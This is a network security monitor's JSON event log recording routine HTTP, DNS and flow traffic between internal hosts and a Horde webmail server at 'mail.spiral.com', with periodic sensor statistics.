{"timestamp":"2020-02-29T00:00:02.955593+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:00:03.906662+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16131,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:04.000257+0000","flow_id":1959100616671748,"event_type":"flow","src_ip":"192.168.10.122","src_port":53493,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:02.459268+0000","end":"2020-02-28T23:55:02.570517+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:04.000559+0000","flow_id":2248594297295235,"event_type":"flow","src_ip":"192.168.10.122","src_port":34133,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:01.889219+0000","end":"2020-02-28T23:55:02.000453+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:04.125348+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620}} 
{"timestamp":"2020-02-29T00:00:06.000412+0000","event_type":"stats","stats":{"uptime":13658,"capture":{"kernel_packets":131656,"kernel_drops":0},"decoder":{"pkts":131666,"bytes":91548095,"invalid":175,"ipv4":130251,"ipv6":8,"ethernet":131666,"raw":0,"null":0,"sll":0,"tcp":125327,"udp":4735,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2642,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2658,"synack":2649,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1689,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2157,"failed_udp":106},"tx":{"http":4364,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2233}},"flow_mgr":{"closed_pruned":2614,"new_pruned":15,"est_pruned":2207,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":173458,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:06.130347+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20083,"tx_id":1}} {"timestamp":"2020-02-29T00:00:07.959552+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":18}} {"timestamp":"2020-02-29T00:00:09.000169+0000","flow_id":1174723640053537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6516,"start":"2020-02-28T23:59:02.216865+0000","end":"2020-02-28T23:59:07.421832+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:09.131516+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34682,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34777,"tx_id":0}} {"timestamp":"2020-02-29T00:00:09.579471+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62651,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:09.744651+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:00:11.000743+0000","flow_id":1483686392296336,"event_type":"flow","src_ip":"192.168.10.122","src_port":41143,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:10.848784+0000","end":"2020-02-28T23:55:10.956521+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.001125+0000","flow_id":953872111526551,"event_type":"flow","src_ip":"192.168.10.122","src_port":46841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:10.746135+0000","end":"2020-02-28T23:55:10.857663+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.906251+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} 
{"timestamp":"2020-02-29T00:00:11.917081+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48664,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:12.138061+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798}} {"timestamp":"2020-02-29T00:00:12.183305+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:00:12.186770+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:00:12.188718+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:00:12.224277+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:00:12.224594+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:00:12.226518+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:00:12.265633+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:00:12.265685+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:00:12.310542+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:00:12.311477+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:00:14.000165+0000","event_type":"stats","stats":{"uptime":13666,"capture":{"kernel_packets":131707,"kernel_drops":0},"decoder":{"pkts":131749,"bytes":91582877,"invalid":175,"ipv4":130334,"ipv6":8,"ethernet":131749,"raw":0,"null":0,"sll":0,"tcp":125405,"udp":4740,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2645,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2661,"synack":2652,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1693,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2159,"failed_udp":106},"tx":{"http":4372,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2235}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2209,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":174216,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:14.001000+0000","flow_id":1593959677759463,"event_type":"flow","src_ip":"192.168.10.122","src_port":32817,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:13.724967+0000","end":"2020-02-28T23:55:13.836542+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:16.606407+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58242,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":10,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.229309+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} 
{"timestamp":"2020-02-29T00:00:17.231489+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52626,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.316883+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:00:17.808975+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57151,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:18.056280+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318}} {"timestamp":"2020-02-29T00:00:18.115962+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":0}} 
